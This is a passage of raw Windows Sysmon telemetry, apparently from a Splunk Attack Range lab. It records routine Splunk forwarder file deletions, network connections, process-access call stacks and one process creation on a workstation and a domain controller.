Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C7CAA65A6EB786A8438421267BCD36D1,SHA256=7931874DC368DB0593CEDBCA2A1A692891D95D7CA416481D5B545746E2652345,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223229Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:27:41.624{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E95E3AACFD4F0949CF19C23F5E7F3EB6,SHA256=85161203CD94C90C013B1A651AFA58B87909A5E706EBB766CC752B6B3BF4BC58,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000299410Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:27:40.209{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49610-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8089- 23542300x8000000000000000299409Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:27:41.081{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D7A471F6DC31C3C79034E710F19E6F36,SHA256=92BF332CD1A1F6FF11DC57838D36DBB74BACFA5FEECC5CFCB83BDCC124C4FCD8,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000223228Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:27:38.675{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51775-false10.0.1.12-8000- 23542300x8000000000000000223230Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:27:42.639{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F5CE816875A47B7F39A8A44F1CB2F7B1,SHA256=2BEF3070BB6A2D4780BAC65D9DD46F04041B8FCD8A34CF7287101ECFFD99B9A8,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000299412Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:27:40.726{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49611-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000299411Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:27:42.089{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6BEB2415E2AD78C039CD32E144E568B8,SHA256=981C76112988F1E91BC3BFC435327FDCCF21FBBC2BD1FA649C43A5242103FCFF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223231Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:27:43.655{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DE4E0C56001B916A4C8BF66579E32251,SHA256=FDEC54C4DBE45B35738303454F07155C1EE5B1F2D5FA771456F9D1E4C12B06B1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299413Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:27:43.138{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1F63B176B07B1857DAB4657E0341222D,SHA256=0D957C6D3B37EF00B24886A1C7084A1C30D4A0AB2CC893950A36A986DDA581A3,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000223258Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:27:44.889{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-1A30-6216-5D05-000000003902}3428C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223257Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:27:44.889{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223256Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:27:44.889{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223255Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:27:44.889{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223254Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:27:44.889{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223253Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:27:44.889{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223252Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:27:44.889{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223251Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:27:44.889{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223250Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:27:44.889{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223249Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:27:44.889{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223248Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:27:44.889{4F8D34B0-F11B-6215-0500-000000003902}4121208C:\Windows\system32\csrss.exe{4F8D34B0-1A30-6216-5D05-000000003902}3428C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000223247Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:27:44.889{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-1A30-6216-5D05-000000003902}3428C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000223246Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:27:44.890{4F8D34B0-1A30-6216-5D05-000000003902}3428C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000223245Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:27:44.874{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=75DE35D52B2936513665FA852804846A,SHA256=84E6801372328655801A51052BB258E7837401EB8393629EE25683EF33757AC7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299414Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:27:44.172{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A806CB73CCCFB644B52B2741D7B36107,SHA256=9BFEBED99EAC59AA173276F23707AA8C100EEF80AADED22161606268EE97C4B9,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000223244Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:27:44.218{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-1A30-6216-5C05-000000003902}1952C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223243Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:27:44.218{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223242Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:27:44.218{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223241Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:27:44.218{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223240Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:27:44.218{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223239Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:27:44.218{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223238Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:27:44.218{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223237Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 